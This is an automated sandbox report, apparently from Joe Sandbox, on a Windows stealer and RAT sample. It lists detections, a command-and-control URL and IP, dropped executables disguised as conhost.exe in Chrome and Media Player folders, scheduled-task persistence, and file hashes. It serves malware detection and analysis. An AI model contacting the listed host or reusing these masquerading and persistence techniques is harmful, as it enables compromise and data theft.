                          C:\Users\user\Desktop\XmhcMluo.log11%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\Zallyypm.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\ZrGvzZJn.log25%ReversingLabs
                          C:\Users\user\Desktop\afwLyhfm.log9%ReversingLabs
                          C:\Users\user\Desktop\bQGwUejE.log17%ReversingLabs
                          C:\Users\user\Desktop\bcXTThuh.log8%ReversingLabs
                          C:\Users\user\Desktop\dVnCFeff.log25%ReversingLabs
                          C:\Users\user\Desktop\exStwvKV.log25%ReversingLabs
                          C:\Users\user\Desktop\fSOKaeua.log21%ReversingLabs
                          C:\Users\user\Desktop\gPpSweJV.log17%ReversingLabs
                          C:\Users\user\Desktop\jGLeSKCo.log17%ReversingLabs
                          C:\Users\user\Desktop\jybLobci.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\kHClnwJL.log8%ReversingLabs
                          C:\Users\user\Desktop\kOdTVPKT.log21%ReversingLabs
                          C:\Users\user\Desktop\kuPmEXym.log3%ReversingLabs
                          C:\Users\user\Desktop\lnWbuaeE.log8%ReversingLabs
                          C:\Users\user\Desktop\mHfKTHWS.log16%ReversingLabs
                          C:\Users\user\Desktop\mzvrpXvN.log8%ReversingLabs
                          C:\Users\user\Desktop\npJJQJjz.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\pHCSiMBb.log16%ReversingLabs
                          C:\Users\user\Desktop\pKSShysD.log25%ReversingLabs
                          C:\Users\user\Desktop\pyJigHPD.log29%ReversingLabs
                          C:\Users\user\Desktop\qwPLRqWX.log29%ReversingLabs
                          C:\Users\user\Desktop\rNFADhxz.log17%ReversingLabs
                          C:\Users\user\Desktop\rmNqRUKB.log17%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.phptrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drfalse
                            		high
                            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000054.00000003.2651347076.00000241EDA72000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDA0E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/chrome_newtabit0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drfalse
                                		high
                                https://duckduckgo.com/ac/?q=it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drfalse
                                  		high
                                  https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoit0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1900716755.0000026100227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.000002023656E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD03707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849F157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B42C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F303F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchit0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drfalse
                                                		high
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1900716755.0000026100227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.000002023656E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD03707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849F157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B42C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F303F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drfalse
                                                    		high
                                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000054.00000003.2651347076.00000241EDAA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDB07000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDAF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDAE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drfalse
                                                        		high
                                                        https://aka.ms/pscore68powershell.exe, 00000001.00000002.1900716755.0000026100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.00000202361C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DABB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD034F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849EF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B40A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F301D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E342000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3XtEci4Mmo.exe, 00000000.00000002.1788927246.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1900716755.0000026100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.00000202361C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DABB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD034F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849EF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B40A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F301D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E342000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drfalse
                                                                		high
                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    185.177.239.66
                                                                    		unknownPoland
                                                                    		9009M247GBtrue

                                                                    Private

                                                                    IP
                                                                    127.0.0.1

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1586105
                                                                    Start date and time:2025-01-08 18:06:08 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 11m 8s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:84
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Sample name:3XtEci4Mmo.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:529b29e8bcef9cc790f7c61f40d44b39.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@106/209@0/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 50%
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 23.56.254.164, 172.202.163.200, 13.107.246.45
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target TezdDRgSgyeGDKRkzk.exe, PID 8300 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: 3XtEci4Mmo.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    12:07:08API Interceptor502x Sleep call for process: powershell.exe modified
                                                                    12:08:35API Interceptor79x Sleep call for process: TezdDRgSgyeGDKRkzk.exe modified
                                                                    12:08:36API Interceptor2x Sleep call for process: svchost.exe modified
                                                                    17:07:07Task SchedulerRun new task: conhostc path: "C:\Recovery\conhost.exe"
                                                                    17:07:07Task SchedulerRun new task: TezdDRgSgyeGDKRkzk path: "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
                                                                    17:07:08Task SchedulerRun new task: TezdDRgSgyeGDKRkzkT path: "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                                                                    17:07:11Task SchedulerRun new task: conhost path: "C:\Program Files\Google\Chrome\Application\conhost.exe"

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    No context

                                                                    Domains

                                                                    No context

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    M247GBmiori.m68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 217.138.193.6
                                                                    Draft HBL# TTPE6948502 SO#4174 - LCL SHIPPING ADVICE (KHH-HKG)-FOB .scr.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                    • 104.250.180.178
                                                                    Hilix.m68k.elfGet hashmaliciousMiraiBrowse
                                                                    • 45.13.30.97
                                                                    5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                    • 185.244.212.106
                                                                    random.exeGet hashmaliciousPoverty StealerBrowse
                                                                    • 185.244.212.106
                                                                    mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 45.88.100.158
                                                                    db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                    • 213.109.189.115
                                                                    UD3cS4ODWz.exeGet hashmaliciousUnknownBrowse
                                                                    • 185.156.175.43
                                                                    nXNMsYXFFc.exeGet hashmaliciousUnknownBrowse
                                                                    • 185.156.175.43
                                                                    UD3cS4ODWz.exeGet hashmaliciousUnknownBrowse
                                                                    • 185.156.175.43

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\user\Desktop\AfaiVEic.log6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      aW6kSsgdvv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          kJrNOFEGbQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            lEwK4xROgV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              zZ1Y43bxxV.exeGet hashmaliciousDCRatBrowse
                                                                                VqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  updIMdPUj8.exeGet hashmaliciousDCRatBrowse
                                                                                    voed9G7p5s.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      f3I38kv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Program Files (x86)\Windows Media Player\Visualizations\78fe9fe6f28b21

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):242
                                                                                        Entropy (8bit):5.823138385221527
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Rxh+XPQE1X06AXAs8nZFjij+FDznCfQ/9Il00bOEhkhF:nKqQVZFjK+FDznCcI79yF
                                                                                        MD5:A23B6C0D67C04FF092F029F320625C3B
                                                                                        SHA1:9A7E555C63BCCD2E17A7FA57F9850BC6494B3CA5
                                                                                        SHA-256:7D6ADC23259C85629E1DE530F19A4D00AE1E2DDC9552FF2CC8DA1EBDB7E1548C
                                                                                        SHA-512:40C8F04EDDC349C1E0CD57C40918030D87CE15BC4F590E27316E621F89267E73868F52C2B58366D010361A0255720DCDC5DF562A2E359F536B6BE42E823B52C6
                                                                                        Malicious:false
                                                                                        Preview:KLCMOQlxyXcMqBgWLh8KmHMaXebnMm3uaHRxPRAyd3e0GfnTGAeM5jmC8myuy7kLerwittG3gKqsnWU21IhMHrz0fOyncQ9gSSWZtFkX3lpu23ZmS62qZYDx15De5dbQLKZU94JwiKSgBF8lzLUgXSG4PjhxCFbaJZjsdFnXwGIPFgvw6bouI522DfEaWVucs2XmfQHuh7tQK0zsxv0kaqROhqo8ANAbWphNJJQqT4MLLlrMqW

                                                                                        C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@.................................po:.K.....:.p.....................:...................................................... ............... ..H............text....O:.. ...P:................. ..`.rsrc...p.....:......R:.............@....reloc........:......V:.............@..B.................o:.....H.......4..........j......../..n:......................................0..........(.... ........8........E................9...8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{f...:....& ....8........0..)....... ........8........E........k...............*...8.......... ....~....{....:....& ....8........~....(@...~....(D... ....?S... ....~....{z...:....& ....8x...~....9.... ....~....{....9Z...& ....8O...r...ps....z*8.... ....~....{c...:*...& ....8....~

                                                                                        C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\Program Files\Google\Chrome\Application\088424020bedd6

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with very long lines (605), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):605
                                                                                        Entropy (8bit):5.90224172997415
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:XikFg6ojnyBAkqRPFPj5V12NsdRH2/Tjwzintlwf0mYutX3n:XVaRyWkqRV5HqsdRHTzitlG0k3
                                                                                        MD5:7FCEFAA50F73A13EFF3079753296D259
                                                                                        SHA1:CB6E20041B1B440A1B94B4E4FCC69104CCE0B1BC
                                                                                        SHA-256:F8342C1222B939DFFAD431EC30071202DA6DB6E5ADFCA3318828CE6D504A2FB3
                                                                                        SHA-512:B39784485143C88EB5C09A1A82FC9BC1C4906FFD7FD1FD295BA1C9FDA6FFA080CEB4004435DD6578400BDCDDB9E2B77E52710039B9115303B45C5BB00F719037
                                                                                        Malicious:false
                                                                                        Preview:JtU6S4eTljofJQfeGC59bSokZ6NofmAEbFKL2O3rM3Ew8GU2fhfFJzJ1FthVq0y9ijDEGUl1JNwiN1mTlUI7H54l6TFIqhAWEENYCQwK6n65DknNHOuWr12nocIwPdLlNZdJoNQUh8Bd89hVq1AcxopNLjukI95cbUsoHej48ZyszYpp4xGXctyiuP7EdpMiDiBnQ3NMSGdXz6Xw4EqV2h9sgJ41gfaSNQpRWBYBj4FWPbtx1KJY91pfiTHG9WpwqLKiQGa3pov7cndFaG9WWBSWlKsD3SCNPSqDRKhvuPtUFrC5zCp2WTao2y7GYW9XmisK7ZyQiOlGS8Q3HwO1mJ061BLdMbXYPVsg918aOZTIrUW4hE8lIIudswT5NVDH0N06Qt4QxxnMzrOhpR5IcvPHlOyNiDM3WLRedZnxKrxUfhnAhwP6Z5pF7sVB4qrult0nauDQnH8u75mDlypwyQdagMguEm3dADsvqAjxs9SR64HCGRaGB56VQZGONSLBOfu4M1WkO1Dy7LemEeowLwbEGXeQ3VkZxQDbJMzO5z1K2HXE5eJsoZzbEqxyWFr3RnBrIDc2pZ1W5RL9AaVYM1vXalWdY

                                                                                        C:\Program Files\Google\Chrome\Application\conhost.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@.................................po:.K.....:.p.....................:...................................................... ............... ..H............text....O:.. ...P:................. ..`.rsrc...p.....:......R:.............@....reloc........:......V:.............@..B.................o:.....H.......4..........j......../..n:......................................0..........(.... ........8........E................9...8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{f...:....& ....8........0..)....... ........8........E........k...............*...8.......... ....~....{....:....& ....8........~....(@...~....(D... ....?S... ....~....{z...:....& ....8x...~....9.... ....~....{....9Z...& ....8O...r...ps....z*8.... ....~....{c...:*...& ....8....~

                                                                                        C:\Program Files\Google\Chrome\Application\conhost.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\Program Files\Windows Security\BrowserCore\en-US\78fe9fe6f28b21

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with very long lines (822), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):822
                                                                                        Entropy (8bit):5.906198725374328
                                                                                        Encrypted:false
